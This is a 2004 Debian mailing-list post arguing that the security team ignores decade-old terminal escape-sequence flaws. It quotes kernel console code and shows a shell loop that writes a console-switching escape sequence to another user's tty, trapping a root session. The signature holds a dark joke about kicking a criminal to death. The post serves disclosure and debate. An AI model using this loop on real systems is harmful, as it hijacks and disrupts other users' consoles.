On Mon, Apr 19, 2004 at 11:18:41AM -0700, Matt Zimmerman wrote:
> On Mon, Apr 19, 2004 at 07:51:27PM +0200, Jan Minar wrote:
> > Come on, Matt:  Virtually all terminal emulators are vulnerable, and the
> > vulnerability is a common knowledge.  The abovementioned paper was on
> > Bugtraq 2003-02-24 21:02:52...  Is the Security Team going to do
> > something about it themselves (filing RC bugs at least)?
> You are part of a community, not somebody purchasing a service.  Take some
> initiative and contribute.

And as a part of this community, I am saying right now:  We have a big
problem, and the problem is we don't deal with security issues known for
decades, while happily convincing newcomers our system is fairly
secure.  It's not.

Haha, I can feel the free spirit of the computer labs of the late

>>> case 12: /* bring specified console to the front */
>>>     if (par[1] >= 1 && vc_cons_allocated(par[1]-1))
>>>             set_console(par[1] - 1);
>>>     break;

% ssh kh
[EMAIL PROTECTED]'s password:
Linux kontryhel 2.4.26-jan #3 SMP Mon Apr 19 05:00:00 CEST 2004 i686 unknown
% echo 'Morning, Mister root, welcome to a jail 8-)' > /dev/tty63
% while :; do echo -e '\033[12;63]' > /dev/tty63; done

> The security team does not have the resources to audit Debian, and can
> barely keep up with new issues as they become known.  Pointing and whining
> doesn't help.

This is a *known issue*.  It just seems there is no will to fix this...
for over a decade.  If Debian is going to be as insecure as this, why
don't all the Security Team take a long pleasurable holiday, after all?

Q: To prece nejde nekoho zastrelit jen tak. Kazdy ma sva nezadatelna lidska
   prava, i ten zlocinec.  Bylo fakt nutne strilet?
A: To urcite nebylo. Mohli ho chytit a ukopat.

Attachment: pgpbVp2QOtfcS.pgp
Description: PGP signature

Reply via email to